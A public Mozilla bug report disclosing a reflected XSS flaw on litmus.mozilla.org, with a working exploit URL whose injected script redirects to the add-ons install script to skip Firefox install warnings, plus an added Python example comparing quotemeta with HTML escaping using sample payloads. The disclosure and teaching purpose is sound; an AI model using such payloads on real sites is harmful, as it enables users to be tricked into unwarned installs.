Closed Bug 718448 Opened 12 years ago Closed 8 years ago

XSS vulnerability on litmus.mozilla.org allows circumventing add-on source checks in Firefox

Categories

(Webtools Graveyard :: Litmus, defect)

defect
Not set
normal

Tracking

(Not tracked)

RESOLVED WORKSFORME

People

(Reporter: jwkbugzilla, Unassigned)

Details

(Keywords: wsec-xss)

Please see the example link:

https://litmus.mozilla.org/advanced_search.cgi?search_field1=comment&match_criteria1=regexp&search_value1=8848484&search_field2=build_id&match_criteria2=%3Cscript%3Ewindow%2Elocation%2Ehref=%22https%3A%2F%2Faddons.mozilla.org%2Fservices%2Finstall.php%3Faddon_id%3D1865%26addon_name%3DGreatest%20Add-on%20Ever%22%3C%2Fscript%3E&search_value2=test

This will abuse an XSS vulnerability in litmus.mozilla.org to redirect to https://addons.mozilla.org/services/install.php with a mozilla.org referrer. This page allows installing any AMO add-on if the referring website is a Mozilla site - so in this example you will get prompted to install Adblock Plus without the usual warnings. Regardless of the litmus.mozilla.org vulnerability, I find the functionality of this install script concerning - it allows using any XSS vulnerability on any Mozilla site to disable security warnings in Firefox when installing add-ons.

As to litmus.mozilla.org, the web application seems riddled with bad security practices. Here I abused the non-existent escaping of the match_criteriaN parameter; other parameters are only escaped via quotemeta, however, which is clearly insufficient for strings inserted into HTML, even though exploiting this vulnerability isn't simple. It's also compiling SQL queries in a way that makes me suspect SQL vulnerabilities if one digs a little.
Group: websites-security → webtools-security
Component: Other → Litmus
Product: Websites → Webtools
QA Contact: other → litmus
Version: unspecified → other
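To make the quotemeta point concrete, here is an added Python example (not Litmus code; Litmus is a Perl CGI application and the echo template below is hypothetical). It approximates Perl's quotemeta, which backslashes regex metacharacters, and contrasts it with real HTML escaping on a request shaped like the report's link, using a shortened, constructed payload.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample request in the shape of the report's link (payload shortened).
SAMPLE_URL = (
    "https://litmus.mozilla.org/advanced_search.cgi?search_field2=build_id"
    "&match_criteria2=%3Cscript%3Ealert%281%29%3C%2Fscript%3E"
    "&search_value2=%22%20onfocus%3D%22alert%281%29"
)

HTML_METACHARS = '<>"\''


def quotemeta(s: str) -> str:
    """Approximation of Perl's quotemeta: backslash every ASCII non-word character.

    This neutralises regex metacharacters only. HTML has no backslash escape, so
    '<', '>' and '"' survive unchanged, merely prefixed with a backslash.
    """
    return re.sub(r"([^A-Za-z0-9_])", r"\\\1", s)


def html_escape(s: str) -> str:
    """Escaping that is correct for text nodes and double-quoted attribute values."""
    return html.escape(s, quote=True)


def render_row(url: str, esc) -> str:
    """Hypothetical results-page row that echoes the submitted search terms back."""
    q = parse_qs(urlsplit(url).query)
    field, criteria, value = (q.get(k, [""])[0] for k in
                              ("search_field2", "match_criteria2", "search_value2"))
    return (f"<tr><td>{esc(field)}</td><td>{esc(criteria)}</td>"
            f'<td><input name="search_value" value="{esc(value)}"></td></tr>')


def audit(url: str) -> dict:
    """Per strategy: does user input still reach the markup with raw HTML metacharacters?"""
    q = parse_qs(urlsplit(url).query)
    user_parts = [q.get(k, [""])[0] for k in ("match_criteria2", "search_value2")]
    strategies = {"none": lambda s: s, "quotemeta": quotemeta, "html": html_escape}
    return {name: any(c in esc(p) for p in user_parts for c in HTML_METACHARS)
            for name, esc in strategies.items()}


if __name__ == "__main__":
    for name, esc in (("none", lambda s: s), ("quotemeta", quotemeta), ("html", html_escape)):
        print(f"{name:10} {render_row(SAMPLE_URL, esc)}")
    print(audit(SAMPLE_URL))
```

Only the html strategy leaves no raw metacharacter in the output; quotemeta merely decorates them with backslashes that the HTML parser ignores.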
Adding keywords to bugs for metrics, no action required. Sorry about bugmail spam.
Keywords: wsec-xss
Resolving WORKSFORME since litmus.mozilla.org is gone for good. I think that this can be made public now.
Status: NEW → RESOLVED
Closed: 8 years ago
Flags: needinfo?(amuntner)
Resolution: --- → WORKSFORME
Group: webtools-security
Flags: needinfo?(amuntner)
Product: Webtools → Webtools Graveyard